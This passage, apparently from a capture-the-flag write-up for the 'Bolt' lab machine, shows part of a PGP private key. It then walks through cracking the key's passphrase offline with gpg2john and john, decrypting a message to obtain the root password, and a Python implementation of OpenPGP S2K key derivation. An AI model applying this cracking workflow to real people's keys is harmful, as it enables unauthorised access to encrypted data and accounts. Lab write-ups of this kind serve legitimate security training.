n0LJKVoiPuZr/C0gDkek/i+p864FeN6oHNxLVLffrhr77f2aMQ4hnSsJYzuz
4sOO1YdK7/88KWj2QwlgDoRhj26sqD8GA/PtvN0lvInYT93YRqa2e9o7gInT
4JoYntujlyG2oZPLZ7tafbSEK4WRHx3YQswkZeEyLAnSP6R2Lo2jptleIV8h
J6V/kusDdyek7yhT1dXVkZZQSeCUUcQXO4ocMQDcj6kDLW58tV/WQKJ3duRt
1VrD5poP49+OynR55rXtzi7skOM+0o2tcqy3JppM3egvYvXlpzXggC5b1NvS
UCUqIkrGQRr7VTk/jwkbFt1zuWp5s8zEGV7aXbNI4cSKDsowGuTFb7cBCDGU
Nsw+14+EGQp5TrvCwHYEGAEIAAkFAmA4G2ECGwwAIQkQHCdBo9w7Sr0WIQTf
QmvHpKivWOUO2g4cJ0Gj3DtKvf4dB/9CGuPrOfIaQtuP25S/RLVDl8XHvzPm
oRdF7iu8ULcA9gTxPn8DNbtdZEnFHHOANAHnIFGgYS4vj3Dj9Q3CEZSSVvwg
6599FMcw9nGzypVOgqgQv8JGmIUeCipD10k8nHW7m9YBfQB04y9wJw99WNw/
Ic3vdhZ6NvsmLzYI21dnWD287sPj2tKAuhI0AqCEkiRwb4Z4CSGgJ5TgGML8
11Izrkqamzpc6mKBGi213tYH6xel3nDJv5TKm3AGwXsAhJjJw+9K0MNARKCm
YZFGLdtA/qMajW4/+T3DJ79YwPQOtCrFyHiWoIOTWfs4UhiUJIE4dTSsT/W0
PSwYYWlAywj5
=cqxZ
-----END PGP PRIVATE KEY BLOCK-----
```

The PGP message found in the database is the ciphertext that needs decrypting.

As is well known, private keys are usually protected by a passphrase, so try cracking it.

  • Convert the key with gpg2john:

```
└─# gpg2john pri.key > tmp
File pri.key

─# cat tmp
Eddie Johnson:$gpg$*1*668*2048*...*3*254*8*9*16*b81f0847e01fb836c8cc7c8a2af31f19*16777216*34af9ef3956d5ad8:::Eddie Johnson <eddie@bolt.htb>::pri.key
```

  • Crack it:

```
┌──(root💀kali)-[~/tmp]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt tmp
Using default input encoding: UTF-8
Loaded 1 password hash (gpg, OpenPGP / GnuPG Secret Key [32/64])
Cost 1 (s2k-count) is 16777216 for all loaded hashes
Cost 2 (hash algorithm [1:MD5 2:SHA1 3:RIPEMD160 8:SHA256 9:SHA384 10:SHA512 11:SHA224]) is 8 for all loaded hashes
Cost 3 (cipher algorithm [1:IDEA 2:3DES 3:CAST5 4:Blowfish 7:AES128 8:AES192 9:AES256 10:Twofish 11:Camellia128 12:Camellia192 13:Camellia256]) is 9 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
merrychristmas   (Eddie Johnson)
1g 0:00:13:03 DONE (2021-12-20 11:05) 0.001277g/s 54.71p/s 54.71c/s 54.71C/s mhines..menudo
Use the "--show" option to display all of the cracked passwords reliably
Session completed
```

Decrypt with the recovered passphrase:

```
gpg --batch --import /tmp/pri.key
gpg --pinentry-mode loopback --passphrase merrychristmas -d /tmp/pub.key

{"password":"Z(2rmxsNW(Z?3=p/9s","description":""}
```
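Why john only manages about 55 candidates per second here is worth seeing in code. The parameters in the gpg2john line (SHA-256, AES-256, an s2k-count of 16777216, the 8-byte salt 34af9ef3956d5ad8) are the key's iterated+salted string-to-key settings; decoding the armored key's secret-key packet confirms them, with a count octet of 0xE0. The following is an added example, not code from the original post: it parses the gpg2john line (field order as I read gpg2john's output, with the long key-material field replaced by a constructed placeholder) and implements RFC 4880 section 3.7.1.3 key derivation, so every passphrase guess costs 16 MiB of SHA-256 before any AES decryption attempt.

```python
"""OpenPGP iterated+salted S2K: the work factor behind the slow passphrase crack above.

Added example. Parses the gpg2john line into S2K parameters and derives the
symmetric key a candidate passphrase would produce (RFC 4880 section 3.7.1.3).
"""
import hashlib
import re

# Constructed from the gpg2john line in the post, with the key-material field elided as DATA.
GPG2JOHN_LINE = (
    "Eddie Johnson:$gpg$*1*668*2048*DATA*3*254*8*9*16*"
    "b81f0847e01fb836c8cc7c8a2af31f19*16777216*34af9ef3956d5ad8"
    ":::Eddie Johnson <eddie@bolt.htb>::pri.key"
)
# Algorithm ids as listed in john's cost output above.
HASH_ALGOS = {1: "md5", 2: "sha1", 3: "ripemd160", 8: "sha256", 9: "sha384", 10: "sha512", 11: "sha224"}
CIPHER_KEY_LEN = {2: 24, 3: 16, 7: 16, 8: 24, 9: 32, 10: 32}   # 3DES, CAST5, AES-128/192/256, Twofish


def parse_gpg2john_line(line):
    """Split the $gpg$ hash into named fields.

    Assumed field order: algo*datalen*bits*data*spec*usage*hash*cipher*ivlen*iv*count*salt.
    """
    m = re.search(r"\$gpg\$\*([^:]*)", line)
    if not m:
        raise ValueError("no $gpg$ hash in line")
    f = m.group(1).split("*")
    return {
        "pubkey_algo": int(f[0]), "bits": int(f[2]), "s2k_spec": int(f[4]),
        "usage": int(f[5]), "hash_algo": int(f[6]), "cipher_algo": int(f[7]),
        "iv": bytes.fromhex(f[9]), "count": int(f[10]), "salt": bytes.fromhex(f[11]),
    }


def decode_s2k_count(octet):
    """RFC 4880 3.7.1.3: count = (16 + low nibble) << (high nibble + 6)."""
    return (16 + (octet & 15)) << ((octet >> 4) + 6)


def s2k_iterated_salted(passphrase, salt, count, key_len, hash_name="sha256"):
    """Hash `count` bytes of the repeated salt||passphrase stream.

    If the hash is shorter than the key, further contexts are preloaded with 1, 2, ...
    zero bytes and their digests concatenated (RFC 4880 3.7.1.1).
    """
    block = salt + passphrase
    count = max(count, len(block))               # never hash less than one full block
    chunk = block * max(1, 65536 // len(block))  # a multiple of block keeps the stream aligned
    out = b""
    preload = 0
    while len(out) < key_len:
        h = hashlib.new(hash_name)
        h.update(b"\x00" * preload)
        remaining = count
        while remaining > 0:
            piece = chunk[:remaining]
            h.update(piece)
            remaining -= len(piece)
        out += h.digest()
        preload += 1
    return out[:key_len]


def derive_key(params, passphrase):
    """Key that would be tried against the secret-key packet for this passphrase (32 bytes for AES-256)."""
    return s2k_iterated_salted(passphrase.encode(), params["salt"], params["count"],
                               CIPHER_KEY_LEN[params["cipher_algo"]], HASH_ALGOS[params["hash_algo"]])


if __name__ == "__main__":
    p = parse_gpg2john_line(GPG2JOHN_LINE)
    print("count from line:", p["count"], "count from octet 0xE0:", decode_s2k_count(0xE0))
    print("derived key:", derive_key(p, "merrychristmas").hex())
```

The derived key is only the first step: the real check decrypts the secret-key material with it and verifies the packet's SHA-1 checksum, which is what john does after each S2K run. The defensive lesson is the one Clark's email hints at: the S2K count is the only thing slowing an offline attacker down, so a weak passphrase like a single dictionary word falls within minutes regardless of the 16 MiB of hashing per guess.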

Switch user to root with that password; privilege escalation complete.
